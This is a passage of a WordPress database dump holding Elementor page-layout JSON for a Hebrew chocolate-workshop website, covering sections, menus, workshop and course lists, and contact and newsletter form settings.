ime\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_size\":\"md\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"button_background_color\":\"#692910\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a330bc8\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5b761419\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3e0c5e0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1c71ccd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"786d6b73\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b8f8c19\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"388c6046\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"6bd4621c\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6c50c739\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"129cbc32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"75b11280\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f0bfe06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5dfe763\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(951,194,'_elementor_version','0.4'),(956,195,'_wp_page_template','elementor_canvas'),(957,195,'_elementor_edit_mode','builder'),(958,195,'_elementor_data','[{\"id\":\"6ca0db42\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"575d07f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4ff16304\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"13ef3f01\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2374377f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"20511488\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4a34667\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f9f9337\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"972ca81\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d4\\u05de\\u05d2\\u05d6\\u05d9\\u05df \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e467453\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":4},\"width\":{\"unit\":\"%\",\"size\":42},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"bc8044c\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_show_excerpt\":\"\",\"cards_meta_data\":[],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"\\u05dc\\u05e7\\u05e8\\u05d9\\u05d0\\u05d4 \\u00bb\",\"cards_show_avatar\":\"\",\"offset\":\"\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"595c4b79\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"55a018\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"42ec654b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7032c8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"68bbbdb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"262a9cad\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1c80b63c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"269f0e2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7d91b4cb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"50ee25e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7235e8ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"27c53cbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 